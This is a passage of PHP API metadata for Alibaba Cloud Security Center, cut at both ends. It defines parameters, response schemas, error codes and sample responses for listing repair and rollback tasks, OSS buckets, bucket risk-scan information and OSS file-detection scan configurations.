rollback tasks', 'methods' => ['get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '213395', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number to display in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of items to display per page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'TaskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the task to be queried.', 'type' => 'string', 'required' => false, 'example' => 'd7b2acf8d362742123e4a84e1bf8****', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of operation task to be queried:'."\n" ."\n" .'- REPAIR: Repair'."\n" ."\n" .'- ROLLBACK: Rollback', 'type' => 'string', 'required' => false, 'example' => 'REPAIR', 'title' => ''], ], [ 'name' => 'CheckId', 'in' => 'query', 'schema' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> You can call the [ListCheckResult](~~ListCheckResult~~) API to obtain the check item ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '76', 'title' => ''], ], [ 'name' => 'OperationTaskInstances', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The instance information of the operation tasks to be queried.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Vendor' => ['description' => 'Cloud asset vendor.', 'type' => 'string', 'required' => false, 'example' => 'ALIYUN', 'title' => ''], 'RegionId' => ['description' => 'The ID of the region where the instance is located.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the server.', 'type' => 'string', 'required' => false, 'example' => 'am-bp1vy2yaj1nvx****', 'title' => ''], ], 'required' => false, 'description' => '', 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Statuses', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'A list of task statuses. Multiple statuses should be separated by commas (,). Values:'."\n" ."\n" .'- **INIT**: Initialization'."\n" ."\n" .'- **FAIL**: Processing failed'."\n" ."\n" .'- **THROTTLING**: Repairing concurrently'."\n" ."\n" .'- **IN\\_BACKUP**: Backing up'."\n" ."\n" .'- **BACKED\\_UP**: Backed up'."\n" ."\n" .'- **BACKUP\\_FAIL**: Backup failed'."\n" ."\n" .'- **REPAIRING**: Repairing'."\n" ."\n" .'- **REPAIR\\_SUCCESS**: Repair succeeded'."\n" ."\n" .'- **REPAIR\\_FAIL**: Repair failed'."\n" ."\n" .'- **REPAIR\\_SUCCESS\\_VERIFYING**: Verifying repair success'."\n" ."\n" .'- **REPAIR\\_SUCCESS\\_UNVERIFIED**: Repair success verification failed'."\n" ."\n" .'- **REPAIR\\_SUCCESS\\_VERIFIED**: Repair success verified'."\n" ."\n" .'- **REPAIR\\_RE\\_EXECUTE**: Re-executing repair'."\n" ."\n" .'- **ROLL\\_BACKING**: Rolling back'."\n" ."\n" .'- **ROLL\\_BACKED**: Rolled back'."\n" ."\n" .'- **ROLL\\_BACK\\_FAIL**: Rollback failed'."\n" ."\n" .'- **ROLL\\_BACK\\_INIT**: Rollback initiated'."\n" ."\n" .'- **ROLL\\_BACK\\_VERIFYING**: Verifying rollback success'."\n" ."\n" .'- **ROLL\\_BACK\\_UNVERIFIED**: Rollback success verification failed'."\n" ."\n" .'- **ROLL\\_BACK\\_VERIFIED**: Rollback success verified', 'type' => 'array', 'items' => ['description' => 'The status of the task.', 'type' => 'string', 'required' => false, 'example' => 'REPAIRING', 'title' => ''], 'required' => false, 'enumValueTitles' => [], 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'Set the language type for the request and response messages. The default value is **zh**. Values:'."\n" ."\n" .'- **zh**: Chinese'."\n" ."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'Schema of Response', 'description' => 'The format of the message.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => 'Id of the request', 'description' => 'The ID of the current request, which is a unique identifier generated by Alibaba Cloud for this request and can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => '3956048F-9D73-5EDB-834B-4827BB48****'], 'OperationTasks' => [ 'description' => 'Detailed instance information list of operation tasks.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'RiskLevel' => ['description' => 'The risk level of the detected alert. Values:'."\n" ."\n" .'- **high**: High risk.'."\n" ."\n" .'- **medium**: Medium risk.'."\n" ."\n" .'- **low**: Low risk.', 'type' => 'string', 'example' => 'high', 'title' => ''], 'CheckId' => ['description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '3', 'title' => ''], 'RegionId' => ['description' => 'The ID of the region where the server is located.', 'type' => 'string', 'example' => 'cn-shenzhen', 'title' => ''], 'LastCheckTime' => ['description' => 'The timestamp of the latest check, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1723173101000', 'title' => ''], 'Status' => ['description' => 'The status of the task. Possible values:'."\n" ."\n" .'- **INIT**:Initialization'."\n" ."\n" .'- **FAIL**:Processing failed'."\n" ."\n" .'- **THROTTLING**:Repairing concurrently'."\n" ."\n" .'- **IN\\_BACKUP**:Backing up'."\n" ."\n" .'- **BACKED\\_UP**:Backed up'."\n" ."\n" .'- **BACKUP\\_FAIL**:Backup failed'."\n" ."\n" .'- **REPAIRING**:Repairing'."\n" ."\n" .'- **REPAIR\\_SUCCESS**:Repair succeeded'."\n" ."\n" .'- **REPAIR\\_FAIL**:Repair failed'."\n" ."\n" .'- **REPAIR\\_SUCCESS\\_VERIFYING**:Verifying repair success'."\n" ."\n" .'- **REPAIR\\_SUCCESS\\_UNVERIFIED**:Verification of repair success failed'."\n" ."\n" .'- **REPAIR\\_SUCCESS\\_VERIFIED**:Verification of repair success succeeded'."\n" ."\n" .'- **REPAIR\\_RE\\_EXECUTE**:Re-executing repair'."\n" ."\n" .'- **ROLL\\_BACKING**:Rolling back'."\n" ."\n" .'- **ROLL\\_BACKED**:Rolled back'."\n" ."\n" .'- **ROLL\\_BACK\\_FAIL**:Rollback failed'."\n" ."\n" .'- **ROLL\\_BACK\\_INIT**:Initiating rollback'."\n" ."\n" .'- **ROLL\\_BACK\\_VERIFYING**:Verifying rollback success'."\n" ."\n" .'- **ROLL\\_BACK\\_UNVERIFIED**:Verification of rollback success failed'."\n" ."\n" .'- **ROLL\\_BACK\\_VERIFIED**:Verification of rollback success succeeded', 'type' => 'string', 'example' => 'REPAIRING', 'title' => ''], 'DealTime' => ['description' => 'The processing time of the task.', 'type' => 'integer', 'format' => 'int64', 'example' => '1723173101010', 'title' => ''], 'TaskId' => ['description' => 'The ID of the operation task.', 'type' => 'string', 'example' => '5bb1a313f9924b728b3c12e007c1****', 'title' => ''], 'RootTaskId' => ['description' => 'The ID of the main task.', 'type' => 'string', 'example' => '01db51b0e5307bb703a22611c86f****', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the server instance.', 'type' => 'string', 'example' => 'i-wz9abo6wgjmh4yep****', 'title' => ''], 'Type' => ['description' => 'The type of the operation task being queried:'."\n" ."\n" .'- REPAIR: Repair'."\n" ."\n" .'- ROLLBACK: Rollback', 'type' => 'string', 'example' => 'REPAIR', 'title' => ''], 'CheckShowName' => ['description' => 'The name of the check item.', 'type' => 'string', 'example' => '开启恶意主机行为防御功能', 'title' => ''], 'StatusShowName' => ['description' => 'The display status of the repair task.', 'type' => 'string', 'example' => '回滚已验证', 'title' => ''], 'RepairSupportType' => ['description' => 'The type of repair supported by the check item:'."\n" ."\n" .'- **1**:Supports repair and rollback operations'."\n" ."\n" .'- **2**:Supports repair but not rollback'."\n" ."\n" .'- **3**:Redirect to a third-party platform for operation', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'SupportRollBack' => ['description' => 'Whether rollback is supported:'."\n" ."\n" .'- true: Supported'."\n" ."\n" .'- false: Not supported', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'InstanceFreed' => ['description' => 'Whether the instance is released:'."\n" ."\n" .'- true: Released'."\n" ."\n" .'- false: Not released', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'ErrorCode' => ['description' => 'The error code.', 'type' => 'string', 'example' => 'BackUpScriptError', 'title' => ''], 'ErrorMsg' => ['description' => 'The error message.', 'type' => 'string', 'example' => 'backUp script error', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'Page information when performing a paginated query.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of items to display per page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of records in the query result.', 'type' => 'integer', 'format' => 'int32', 'example' => '149', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3956048F-9D73-5EDB-834B-4827BB48****\\",\\n \\"OperationTasks\\": [\\n {\\n \\"RiskLevel\\": \\"high\\",\\n \\"CheckId\\": 3,\\n \\"RegionId\\": \\"cn-shenzhen\\",\\n \\"LastCheckTime\\": 1723173101000,\\n \\"Status\\": \\"REPAIRING\\",\\n \\"DealTime\\": 1723173101010,\\n \\"TaskId\\": \\"5bb1a313f9924b728b3c12e007c1****\\",\\n \\"RootTaskId\\": \\"01db51b0e5307bb703a22611c86f****\\",\\n \\"InstanceId\\": \\"i-wz9abo6wgjmh4yep****\\",\\n \\"Type\\": \\"REPAIR\\",\\n \\"CheckShowName\\": \\"开启恶意主机行为防御功能\\",\\n \\"StatusShowName\\": \\"回滚已验证\\",\\n \\"RepairSupportType\\": 1,\\n \\"SupportRollBack\\": true,\\n \\"InstanceFreed\\": true,\\n \\"ErrorCode\\": \\"BackUpScriptError\\",\\n \\"ErrorMsg\\": \\"backUp script error\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 149,\\n \\"Count\\": 20\\n }\\n}","type":"json"}]', 'title' => 'Query Cloud Security Posture Management Operation Tasks', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListOperationTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListOperatedTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListOssBucket' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '172817', 'abilityTreeNodes' => ['FEATUREsasNPORLE'], ], 'parameters' => [ [ 'name' => 'BucketName', 'in' => 'query', 'schema' => ['description' => 'The bucket name.', 'type' => 'string', 'required' => false, 'example' => 'iboxpublic****', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for requests and responses. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'en', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response body.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for this request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => '3956048F-9D73-5EDB-834B-4827BB48****', 'title' => ''], 'Data' => [ 'description' => 'The data details.', 'type' => 'array', 'items' => [ 'description' => 'The data details.', 'type' => 'object', 'properties' => [ 'BucketName' => ['description' => 'The bucket name.', 'type' => 'string', 'example' => 'iboxpublic****', 'title' => ''], 'Support' => ['description' => 'Indicates whether detection is supported. Valid values:'."\n" ."\n" .'- true: Supported.'."\n" .'- false: Not supported.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Message' => ['description' => 'The reason why detection is not supported, if applicable.', 'type' => 'string', 'example' => 'Unsupported Region。', 'title' => ''], 'StorageClass' => ['description' => 'The storage class of the bucket. Valid values:'."\n" ."\n" .'- Standard (default): Standard storage'."\n" .'- IA: Infrequent Access'."\n" .'- Archive: Archive storage'."\n" .'- ColdArchive: Cold Archive storage.', 'type' => 'string', 'example' => 'Standard', 'title' => ''], 'RegionId' => ['description' => 'The region ID.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'SupportConfig' => ['description' => 'Indicates whether configuration is supported. Valid values:'."\n" ."\n" .'* true: Supported.'."\n" .'* false: Not supported.', 'type' => 'string', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query bucket list', 'summary' => 'Queries the list of buckets.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListOssBucket'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListOssBucket', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3956048F-9D73-5EDB-834B-4827BB48****\\",\\n \\"Data\\": [\\n {\\n \\"BucketName\\": \\"iboxpublic****\\",\\n \\"Support\\": true,\\n \\"Message\\": \\"Unsupported Region。\\",\\n \\"StorageClass\\": \\"Standard\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"SupportConfig\\": \\"true\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListOssBucketScanInfo' => [ 'summary' => 'Queries the risk information list of buckets.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return on each page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '20', 'title' => ''], ], [ 'name' => 'BucketName', 'in' => 'query', 'schema' => ['description' => 'The bucket name.', 'type' => 'string', 'required' => false, 'example' => 'iboxpublic****', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The detection status. Valid values:'."\n" ."\n" .'- **1**: Not scanned.'."\n" .'- **2**: Full scan in progress.'."\n" .'- **3**: Incremental scan in progress.'."\n" .'- **4**: Scanned.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'HasRisk', 'in' => 'query', 'schema' => ['description' => 'Specifies whether risky files are detected. Valid values:'."\n" ."\n" .'- **0**: No risks detected.'."\n" .'- **1**: Risky files exist.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'FuzzBucketName', 'in' => 'query', 'schema' => ['description' => 'The bucket name for fuzzy match.', 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The China value is a unique identifier generated by Alibaba Cloud for the request and can be used for troubleshooting.', 'type' => 'string', 'example' => '6C578F36-92D2-552C-8AA0-86EB1AC2****', 'title' => ''], 'PageInfo' => [ 'description' => 'The paging information in a paging query.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries returned per page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '165', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Data' => [ 'description' => 'The data details.', 'type' => 'array', 'items' => [ 'description' => 'The data details.', 'type' => 'object', 'properties' => [ 'BucketName' => ['description' => 'The bucket name.', 'type' => 'string', 'example' => 'hz-new02****', 'title' => ''], 'RegionId' => ['description' => 'The region ID.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'LastScanTime' => ['description' => 'The timestamp of the latest scan, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1698388233883', 'title' => ''], 'LastScanEndTime' => ['description' => 'The end timestamp of the latest scan, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1698388233883', 'title' => ''], 'Scanned' => ['description' => 'Indicates whether the bucket has been scanned. Valid values:'."\n" ."\n" .'- **true**: Scanned.'."\n" .'- **false**: Not scanned.', 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'ScanObject' => ['description' => 'The number of scanned files.', 'type' => 'integer', 'format' => 'int64', 'example' => '100', 'title' => ''], 'TotalObject' => ['description' => 'The total number of files in the bucket.'."\n" ."\n" .'>This parameter is obtained through the OSS GetBucketStat operation.', 'type' => 'integer', 'format' => 'int64', 'example' => '100', 'title' => ''], 'HighRisk' => ['description' => 'The number of high-risk files.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'MediumRisk' => ['description' => 'The number of medium-risk files.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'LowRisk' => ['description' => 'The number of low-risk files.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'Status' => ['description' => 'The detection status. Valid values:'."\n" ."\n" .'- **1**: Not scanned.'."\n" .'- **2**: Full scan in progress.'."\n" .'- **3**: Incremental scan in progress.'."\n" .'- **4**: Scanned.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Support' => ['description' => 'Indicates whether scanning is supported. Valid values:'."\n" ."\n" .'- true: Supported.'."\n" .'- false: Not supported.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Message' => ['description' => 'The reason why scanning is not supported.', 'type' => 'string', 'example' => 'Unsupported Region。', 'title' => ''], 'StorageClass' => ['description' => 'The storage class of the bucket. Valid values:'."\n" ."\n" .'- **Standard**: Standard LRS'."\n" .'- **IA**: Infrequent Access LRS'."\n" .'- **Archive**: Archive LRS'."\n" .'- **ColdArchive**: Cold Archive LRS.', 'type' => 'string', 'example' => 'Archive', 'title' => ''], 'ConfigStatus' => ['description' => 'The enabling status of the bucket scan configuration. Valid values:'."\n" .'- **0**: Not configured.'."\n" .'- **1**: Configured and enabled.'."\n" .'- **2**: Configured but not enabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'DecompressStatus' => ['description' => 'The enabling status of the bucket decompression configuration. Valid values:'."\n" ."\n" .'- **0**: Decompression not configured.'."\n" .'- **1**: Decompression configured.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query risk information list of buckets', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListOssBucketScanInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListOssBucketScanInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"6C578F36-92D2-552C-8AA0-86EB1AC2****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 165\\n },\\n \\"Data\\": [\\n {\\n \\"BucketName\\": \\"hz-new02****\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"LastScanTime\\": 1698388233883,\\n \\"LastScanEndTime\\": 1698388233883,\\n \\"Scanned\\": false,\\n \\"ScanObject\\": 100,\\n \\"TotalObject\\": 100,\\n \\"HighRisk\\": 0,\\n \\"MediumRisk\\": 0,\\n \\"LowRisk\\": 0,\\n \\"Status\\": 1,\\n \\"Support\\": true,\\n \\"Message\\": \\"Unsupported Region。\\",\\n \\"StorageClass\\": \\"Archive\\",\\n \\"ConfigStatus\\": 0,\\n \\"DecompressStatus\\": 0\\n }\\n ]\\n}","type":"json"}]', ], 'ListOssScanConfig' => [ 'summary' => 'Queries the configuration of an Object Storage Service (OSS) file detection policy.', 'methods' => ['get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '197058', 'abilityTreeNodes' => ['FEATUREsasNPORLE'], ], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The policy name.'."\n", 'type' => 'string', 'required' => false, 'example' => 'testName', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'E10BAF1C-A6C5-51E2-866C-76D5922E****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '50', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Data' => [ 'description' => 'The data returned.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The detailed data.'."\n", 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The configuration ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '443496', 'title' => ''], 'Enable' => ['description' => 'Indicates whether the policy is enabled. Valid values:'."\n" ."\n" .'* **1**: yes'."\n" .'* **0**: no'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Name' => ['description' => 'The configuration name.'."\n", 'type' => 'string', 'example' => 'test****', 'title' => ''], 'ScanDayList' => [ 'description' => 'The days on which the scan is executed in a week.'."\n", 'type' => 'array', 'items' => ['description' => 'The day on which the scan is executed in a week.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'title' => '', 'example' => '', ], 'StartTime' => ['description' => 'The time when the scan starts. The time is in the HH:mm:ss format.'."\n", 'type' => 'string', 'example' => '00:00:00'."\n", 'title' => ''], 'EndTime' => ['description' => 'The time when the scan ends. The time is in the HH:mm:ss format.'."\n", 'type' => 'string', 'example' => '06:00:00', 'title' => ''], 'BucketNameList' => [ 'description' => 'The names of the buckets.'."\n", 'type' => 'array', 'items' => ['description' => 'The name of the bucket.'."\n", 'type' => 'string', 'example' => 'amssev-oss****', 'title' => ''], 'title' => '', 'example' => '', ], 'KeySuffixList' => [ 'description' => 'The suffixes of the objects that are scanned.'."\n", 'type' => 'array', 'items' => ['description' => 'The suffix of the object that is scanned.'."\n", 'type' => 'string', 'example' => '.asp', 'title' => ''], 'title' => '', 'example' => '', ], 'KeyPrefixList' => [ 'description' => 'The prefixes of the objects that are scanned.'."\n", 'type' => 'array', 'items' => ['description' => 'The prefix of the object that is scanned.'."\n", 'type' => 'string', 'example' => '/root', 'title' => ''], 'title' => '', 'example' => '', ], 'LastUpdateTime' => ['description' => 'The timestamp when the configuration was last modified.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1698388233883', 'title' => ''], 'BucketCount' => ['description' => 'The number of buckets.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'AllKeyPrefix' => ['description' => 'Indicates whether the prefixes of all objects are matched.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'DecompressMaxLayer' => ['description' => 'The maximum number of decompression levels when multi-level packages are decompressed. Valid values: 1 to 5. If the maximum number of decompression levels is reached, the decompression operation immediately ends and the detection of extracted objects is not affected.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'DecompressMaxFileCount' => ['description' => 'The maximum number of objects that can be extracted during decompression. Valid values: 1 to 1000. If the maximum number of objects that can be extracted is reached, the decompression operation immediately ends and the detection of extracted objects is not affected.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'DecryptionList' => [ 'description' => 'The decryption methods.'."\n", 'type' => 'array', 'items' => ['description' => 'The decryption method. Valid values:'."\n" ."\n" .'* **OSS**: OSS-managed.'."\n" .'* **KMS**: Key Management Service (KMS).'."\n", 'type' => 'string', 'example' => 'KMS', 'title' => ''], 'title' => '', 'example' => '', ], 'LastModifiedStartTime' => ['description' => 'The timestamp when the object was last modified. The time must be later than the timestamp that you specify. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1724301769834', 'title' => ''], 'RealTimeIncr' => ['description' => 'Whether to enable real-time incremental detection. When this parameter is set to true, the parameters ScanDayList, StartTime, and EndTime are not effective.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"E10BAF1C-A6C5-51E2-866C-76D5922E****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 50\\n },\\n \\"Data\\": [\\n {\\n \\"Id\\": 443496,\\n \\"Enable\\": 1,\\n \\"Name\\": \\"test****\\",\\n \\"ScanDayList\\": [\\n 1\\n ],\\n \\"StartTime\\": \\"00:00:00\\\\n\\",\\n \\"EndTime\\": \\"06:00:00\\",\\n \\"BucketNameList\\": [\\n \\"amssev-oss****\\"\\n ],\\n \\"KeySuffixList\\": [\\n \\".asp\\"\\n ],\\n \\"KeyPrefixList\\": [\\n \\"/root\\"\\n ],\\n \\"LastUpdateTime\\": 1698388233883,\\n \\"BucketCount\\": 10,\\n \\"AllKeyPrefix\\": true,\\n \\"DecompressMaxLayer\\": 1,\\n \\"DecompressMaxFileCount\\": 100,\\n \\"DecryptionList\\": [\\n \\"KMS\\"\\n ],\\n \\"LastModifiedStartTime\\": 1724301769834,\\n \\"RealTimeIncr\\": true\\n }\\n ]\\n}","type":"json"}]', 'title' => 'ListOssScanConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ 